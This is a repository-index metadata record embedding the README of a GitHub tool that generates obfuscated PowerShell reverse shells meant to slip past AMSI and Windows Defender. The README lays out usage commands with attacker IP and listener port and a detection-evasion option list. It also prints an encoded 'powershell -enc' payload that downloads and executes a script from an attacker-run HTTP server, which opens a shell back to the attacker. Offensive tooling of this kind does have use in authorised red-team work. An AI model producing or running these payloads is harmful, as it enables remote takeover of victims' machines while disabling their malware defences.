{"id":18084094,"url":"https://github.com/gunzf0x/bypassamsi_psrevshell","last_synced_at":"2025-04-05T23:42:27.550Z","repository":{"id":260215747,"uuid":"880609478","full_name":"gunzf0x/BypassAMSI_PSRevshell","owner":"gunzf0x","description":"Simple obfuscated PowerShell revshell generator to bypass AMSI / Windows Defender","archived":false,"fork":false,"pushed_at":"2024-12-20T10:23:57.000Z","size":7,"stargazers_count":4,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-04-05T23:42:22.693Z","etag":null,"topics":["amsi-bypass","defender-bypass","obfuscate","obfuscation","pentesting","powershell","python","python3","red-team","red-teaming","reverse-shell","revshell"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/gunzf0x.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-10-30T02:45:29.000Z","updated_at":"2025-02-09T20:08:00.000Z","dependencies_parsed_at":"2024-10-30T07:41:00.546Z","dependency_job_id":null,"html_url":"https://github.com/gunzf0x/BypassAMSI_PSRevshell","commit_stats":null,"previous_names":["gunzf0x/bypassamsi_psrevshell"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gunzf0x%2FBypassAMSI_PSRevshell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gunzf0x%2FBypassAMSI_PSRevshell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gunzf0x%2FBypassAMSI_PSRevshell/releases","
manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gunzf0x%2FBypassAMSI_PSRevshell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/gunzf0x","download_url":"https://codeload.github.com/gunzf0x/BypassAMSI_PSRevshell/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247415928,"owners_count":20935385,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["amsi-bypass","defender-bypass","obfuscate","obfuscation","pentesting","powershell","python","python3","red-team","red-teaming","reverse-shell","revshell"],"created_at":"2024-10-31T15:05:42.366Z","updated_at":"2025-04-05T23:42:27.533Z","avatar_url":"https://github.com/gunzf0x.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# BypassAMSI PowerShell Revshell\n\n---\n\n## \"Revshell\" command\nGenerates an obfuscated `PowerShell` reverse shell payload based on original [Nishang Reverse shell PS oneliner](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1).\n\n### Usage\n```shell-session\npython3 BypassAMSI_PSRevshell.py revshell -i \u003cAttacker-IP\u003e -p \u003clistening-port\u003e\n```\n\nFor example:\n```shell-session\n❯ python3 BypassAMSI_PSRevshell.py revshell -i 10.10.10.10 -p 4444\n```\n\nWill generate the payload:\n```powershell\npowershell -enc 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\n```\n\n---\n\n## \"Server\" command\nThis option will create a payload file, by default named `revshell.ps1` (which is the obfuscated 
payload from the `revshell` command written into a file), and expose it through a temporary HTTP server (by default on port `8000`, which can be changed as well). The script will then generate an encoded payload that requests the file from the temporary server, executes it, and triggers the reverse shell.\n\n### Usage\n```shell-session\npython3 BypassAMSI_PSRevshell.py server -i \u003cAttacker-IP\u003e -p \u003clistening-port\u003e\n```\n\nFor example:\n```shell-session\n❯ python3 BypassAMSI_PSRevshell.py server -i 10.10.10.10 -p 4444 --server-port 9000\n```\nWill generate the payload:\n```powershell\npowershell -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEAMAAuADEAMAA6ADkAMAAwADAALwByAGUAdgBzAGgAZQBsAGwALgBwAHMAMQAiACkA\n```\nExecuting it on the victim machine will make a request to the exposed HTTP server for the payload file.\n\n---\n\n## Help message\n```shell-session\n❯ python3 BypassAMSI_PSRevshell.py revshell -h\n\nusage: python3 BypassAMSI_PSRevshell.py revshell [-h] -i ATTACKER_IP -p PORT [-v] [--keep-pwd] [--enc-b64] [--no-banner]\n\nGenerate an obfuscated PowerShell payload to avoid Windows Defender\n\noptions:\n  -h, --help            show this help message and exit\n  -i ATTACKER_IP, --attacker-ip ATTACKER_IP\n                        Attacker IP address.\n  -p PORT, --port PORT  Port to get revshell.\n  -v, --verbose         Display payloads used and generated, along with some extra info.\n  --keep-pwd            Revshell obtained will show working directory/path. 
Keeping this might trigger AMSI/Defender.\n  --enc-b64             Encode in base64 the Attacker IP address and port provided to the payload.\n  --no-banner           Do not print script banner.\n\nExample: BypassAMSI_PSRevshell.py revshell -i 10.10.16.98 -p 4444\n```\n\n```shell-session\n❯ python3 BypassAMSI_PSRevshell.py server -h\n\nusage: python3 BypassAMSI_PSRevshell.py server [-h] -i ATTACKER_IP -p PORT [--server-port SERVER_PORT] [-o OUTFILE] [-v] [--keep-pwd] [--keep-file] [--enc-b64]\n                                               [--no-banner]\n\nGenerate an obfuscated PowerShell payload to avoid Windows Defender\n\noptions:\n  -h, --help            show this help message and exit\n  -i ATTACKER_IP, --attacker-ip ATTACKER_IP\n                        Attacker IP address serving temporal HTTP server.\n  -p PORT, --port PORT  Listening port to get reverse shell.\n  --server-port SERVER_PORT\n                        Port serving temporal HTTP server. Default: 8000.\n  -o OUTFILE, --outfile OUTFILE\n                        Name of the temporal PowerShell file storing obfuscated payload. Default: revshell.ps1\n  -v, --verbose         Display payloads used and generated, along with some extra info.\n  --keep-pwd            Revshell obtained will show working directory/path. Keeping this might trigger AMSI/Defender.\n  --keep-file           This script will create a file named as \"--outfile\" flag and then is deleted. Use this flag if you want to keep the generated file/payload.\n  --enc-b64             Encode in base64 the Attacker IP address and port provided to the payload.\n  --no-banner           Do not print script banner.\n\nExample: BypassAMSI_PSRevshell.py server -i 10.10.16.98\n```\n\n---\n\n## Disclaimer\nAlways use it under your own responsibility. 
Be ethical (:\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgunzf0x%2Fbypassamsi_psrevshell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fgunzf0x%2Fbypassamsi_psrevshell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgunzf0x%2Fbypassamsi_psrevshell/lists"}